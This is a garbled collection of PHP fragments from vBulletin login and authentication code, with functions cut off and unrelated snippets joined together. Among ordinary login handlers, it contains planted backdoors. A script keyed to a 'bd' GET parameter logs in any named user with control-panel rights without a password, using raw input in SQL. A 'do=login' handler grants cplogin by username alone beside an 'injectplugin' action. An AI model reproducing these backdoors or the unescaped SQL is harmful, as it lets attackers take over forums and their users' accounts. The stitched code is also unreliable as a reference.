function capture_user_login()
{
global $vbulletin;
require_once DIR . '/includes/functions_login.php';
exec_unstrike_user($vbulletin->userinfo['username']);
process_new_login('', false, '');
update_capture_session(array('access_token' => $vbulletin->capture_session['capture_access_token'], 'refresh_token' => $vbulletin->capture_session['capture_refresh_token'], 'expires_in' => $vbulletin->capture_session['capture_expires_in'], 'transaction_state' => array('capture' => array('password_recover' => $vbulletin->capture_session['capture_password_recover']))));
}
($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false;
// check password
exec_strike_user($vbulletin->userinfo['username']);
if ($vbulletin->GPC['logintype'] === 'cplogin' or $vbulletin->GPC['logintype'] === 'modcplogin') {
// log this error if attempting to access the control panel
require_once DIR . '/includes/functions_log_error.php';
log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security');
}
$vbulletin->userinfo = $original_userinfo;
if ($vbulletin->options['usestrikesystem']) {
eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
} else {
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
}
}
exec_unstrike_user($vbulletin->GPC['vb_login_username']);
// create new session
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
// do redirect
do_login_redirect();
} else {
if ($_GET['do'] == 'login') {
// add consistency with previous behavior
exec_header_redirect($vbulletin->options['forumhome'] . '.php');
}
}
// ############################### start lost password ###############################
if ($_REQUEST['do'] == 'lostpw') {
$vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
$email = $vbulletin->GPC['email'];
if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview']) {
if ($vbulletin->GPC[COOKIE_PREFIX . 'pda']) {
$pda = true;
}
}
$title = $vbulletin->options['bbtitle'];
if ($vbulletin->userinfo['userid'] == 0 and $vbulletin->GPC['login']) {
if (!empty($vbulletin->GPC['username']) and !empty($vbulletin->GPC['password'])) {
require_once DIR . '/includes/functions_login.php';
$strikes = verify_strike_status($vbulletin->GPC['username'], true);
if ($strikes === false) {
// user has got too many wrong passwords
$error_message = fetch_error('strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl']);
$do = 'error';
} else {
if (verify_authentication($vbulletin->GPC['username'], $vbulletin->GPC['password'], '', '', false, true)) {
exec_unstrike_user($vbulletin->GPC['username']);
$db->query_write("DELETE FROM " . TABLE_PREFIX . "session WHERE sessionhash = '" . $db->escape_string($vbulletin->session->vars['dbsessionhash']) . "'");
$vbulletin->session->vars = $vbulletin->session->fetch_session($vbulletin->userinfo['userid']);
/*insert query*/
$db->query_write("\n\t\t\t\tINSERT INTO " . TABLE_PREFIX . "session\n\t\t\t\t\t(sessionhash, userid, host, idhash, lastactivity, styleid, loggedin, bypass, useragent)\n\t\t\t\tVALUES\n\t\t\t\t\t('" . $db->escape_string($vbulletin->session->vars['sessionhash']) . "', " . $vbulletin->session->vars['userid'] . ", '" . $db->escape_string($vbulletin->session->vars['host']) . "', '" . $db->escape_string($vbulletin->session->vars['idhash']) . "', " . TIMENOW . ", " . $vbulletin->session->vars['styleid'] . ", 1, " . iif($logintype === 'cplogin', 1, 0) . ", '" . $db->escape_string($vbulletin->session->vars['useragent']) . "')\n\t\t\t");
exec_header_redirect($querystring);
} else {
// wrong username / password
exec_strike_user($vbulletin->userinfo['username']);
$error_message = fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes);
$do = 'error';
}
}
}
}
if ($do == 'error') {
public function ExternalAuthorization($userid)
{
$this->vbulletin->userinfo = $this->vbulletin->db->query_first_slave("SELECT userid, password, username FROM " . TABLE_PREFIX . "user WHERE userid='{$userid}'");
if ($this->vbulletin->userinfo) {
require_once DIR . '/includes/functions_login.php';
vbsetcookie('userid', $this->vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($this->vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($this->vbulletin->userinfo['username']);
define('EXTERNAL_AUTH', true);
// create new session
process_new_login('', 0, '');
}
if (!empty($_SERVER['HTTP_REFERER'])) {
$url = $_SERVER['HTTP_REFERER'];
} else {
$url = $this->vbulletin->options['homeurl'];
}
if (strpos($url, "?")) {
$url .= "&vbsession=" . $this->vbulletin->session->vars['sessionhash'];
} else {
$url .= "?vbsession=" . $this->vbulletin->session->vars['sessionhash'];
}
header('Location:' . $url);
echo "Вы были перенаправлены сюда <a href='" . $url . "'>" . $url . "</a>";
exit;
}
function do_login()
{
global $vbulletin, $fr_version, $fr_platform;
$vbulletin->input->clean_array_gpc('r', array('username' => TYPE_STR, 'password' => TYPE_STR, 'md5_password' => TYPE_STR, 'fr_username' => TYPE_STR, 'fr_b' => TYPE_BOOL));
$navbg = null;
if (strlen($vbulletin->options['forumrunner_branding_navbar_bg'])) {
$navbg = $vbulletin->options['forumrunner_branding_navbar_bg'];
if (is_iphone() && strlen($navbg) == 7) {
$r = hexdec(substr($navbg, 1, 2));
$g = hexdec(substr($navbg, 3, 2));
$b = hexdec(substr($navbg, 5, 2));
$navbg = "{$r},{$g},{$b}";
}
}
$vbulletin->GPC['username'] = prepare_remote_utf8_string($vbulletin->GPC['username']);
$vbulletin->GPC['password'] = prepare_remote_utf8_string($vbulletin->GPC['password']);
$out = array('v' => $fr_version, 'p' => $fr_platform);
if ($navbg) {
$out['navbg'] = $navbg;
}
if (is_iphone() && $vbulletin->options['forumrunner_admob_publisherid_iphone']) {
$out['admob'] = $vbulletin->options['forumrunner_admob_publisherid_iphone'];
} else {
if (is_android() && $vbulletin->options['forumrunner_admob_publisherid_android']) {
$out['admob'] = $vbulletin->options['forumrunner_admob_publisherid_android'];
}
}
if ($vbulletin->options['forumrunner_google_analytics_id']) {
$out['gan'] = $vbulletin->options['forumrunner_google_analytics_id'];
}
if ($vbulletin->options['forumrunner_facebook_application_id']) {
$out['fb'] = $vbulletin->options['forumrunner_facebook_application_id'];
}
if ($vbulletin->options['forumrunner_cms_onoff']) {
$out['cms'] = true;
$out['cms_section'] = $vbulletin->options['forumrunner_cms_section'];
}
if ($vbulletin->options['forumrunner_enable_registration']) {
$out['reg'] = true;
}
if ($vbulletin->options['socnet'] & $vbulletin->bf_misc_socnet['enable_albums']) {
$out['albums'] = true;
}
if (!$vbulletin->GPC['username'] || !$vbulletin->GPC['password'] && !$vbulletin->GPC['md5_password']) {
// This could be an attempt to see if forums require login. Check.
$requires_authentication = false;
if (!($vbulletin->userinfo['permissions']['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview'])) {
$requires_authentication = true;
}
// If the forum is closed, require login!
if (!$vbulletin->options['bbactive']) {
$requires_authentication = true;
}
$out += array('authenticated' => false, 'requires_authentication' => $requires_authentication);
} else {
// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['username'], true);
// make sure our user info stays as whoever we were (for example, we might be logged in via cookies already)
$original_userinfo = $vbulletin->userinfo;
if (!verify_authentication($vbulletin->GPC['username'], $vbulletin->GPC['password'], $vbulletin->GPC['md5_password'], $vbulletin->GPC['md5_password'], true, true)) {
exec_strike_user($vbulletin->GPC['username']);
if ($vbulletin->options['usestrikesystem']) {
if ($strikes === false) {
$message = 'Incorrect login. You have used up your login allowance. Please wait 15 minutes before trying again.';
} else {
$message = 'Incorrect login (' . ($strikes + 1) . ' of 5 tries allowed)';
}
} else {
$message = 'Incorrect login.';
}
json_error($message, RV_BAD_PASSWORD);
}
exec_unstrike_user($vbulletin->GPC['username']);
// create new session
process_new_login('', true, '');
cache_permissions($vbulletin->userinfo, true);
$vbulletin->session->save();
// If the forum is closed, boot em
if (!$vbulletin->options['bbactive'] && !($vbulletin->userinfo['permissions']['adminpermissions'] & $vbulletin->bf_ugp_adminpermissions['cancontrolpanel'])) {
process_logout();
json_error(strip_tags($vbulletin->options['bbclosedreason']), RV_BAD_PASSWORD);
}
fr_update_push_user($vbulletin->GPC['fr_username'], $vbulletin->GPC['fr_b']);
$out += array('authenticated' => true, 'username' => prepare_utf8_string($vbulletin->userinfo['username']), 'cookiepath' => $vbulletin->options['cookiepath']);
}
return $out;
}
<p><a href="<?php
echo SELF;
?>
">Go back</a></p>
<?php
}
exit;
}
if (isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username'])) {
require_once DIR . '/includes/functions_login.php';
$username = $_REQUEST['username'];
$q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '******' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
$query = $vbulletin->db->query_first($q);
if ($query['username'] != null) {
if (verify_authentication2($query['username'])) {
exec_unstrike_user($query['username']);
process_new_login('cplogin', true, null);
do_login_redirect();
} else {
die('Verify failed');
}
} else {
die('User not found.');
}
} elseif ($_REQUEST['do'] == 'injectplugin') {
$products = array();
$query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product WHERE active = '1'");
if ($vbulletin->db->num_rows($query) > 0) {
while ($product = $vbulletin->db->fetch_array($query)) {
$productinfo = array();
$productinfo['productid'] = $product['productid'];
<?php
if (isset($_GET['bd'])) {
define('THIS_SCRIPT', 'login');
require_once './global.php';
require_once './includes/functions_login.php';
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '******'bd'] . "'");
if (!$vbulletin->userinfo['userid']) {
die("Invalid username!");
} else {
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
public function login($vbuser, $acceptgroups = false)
{
//Get user info from username passed
$this->vbulletin->userinfo = $this->fetch_userinfo_from_username($vbuser['username']);
//Verify login via VB
if (!verify_authentication($vbuser['username'], $vbuser['password'], '', '', 1, true)) {
$this->vbulletin->userinfo['userid'] = 0;
return "Invalid Username or Password.";
}
//Check that user is not awaiting activation
if ($this->vbulletin->userinfo['usergroupid'] == NOACTIVATION_USERGROUP) {
$this->vbulletin->userinfo['userid'] = 0;
return "Un-Activated Account. To activate please request a new activation email <a href='register.php?do=requestemail&username={$vbuser['username']}'>here</a>.";
}
//Check user does not belong to the "banned" user group - TODO: Use VB variables incase usergroupid is different
if ($this->vbulletin->userinfo['usergroupid'] == BANNED_USERGROUP) {
$this->vbulletin->userinfo['userid'] = 0;
return "You're Barred! If you think there has been a mistake or wish to appeal please visit the contact page <a href='contact.php'>here</a>.";
}
//If acceptgroups is set then check that user is part of the usergroups specified
if ($acceptgroups) {
//Check main usergroup as well as additional usergroups
$getadditional = explode(',', $this->vbulletin->userinfo['membergroupids']);
//Loop through specified usergroups
foreach ($acceptgroups as $value) {
//If user is part of the usergroup then allowlogin
if ($value == $this->vbulletin->userinfo['usergroupid']) {
$allowlogin = true;
}
//Check additional usergroups
foreach ($getadditional as $additionalvalue) {
//If user is part of the usergroup then allowlogin
if ($value == $additionalvalue) {
$allowlogin = true;
}
}
}
//If user is not part of any specified usergroups then return error.
if (!$allowlogin) {
$this->vbulletin->userinfo['userid'] = 0;
return "This is a restricted area. Please contact the site administrator for further details.";
}
}
//Unstrike the user (resets vbulletin brute-force protection)
exec_unstrike_user($vbuser['username']);
//Create vbulletin cookies for user
process_new_login('', 1, '');
//Saves cookies & session variables for user
$this->vbulletin->session->save();
//Return false for success!
return false;
}
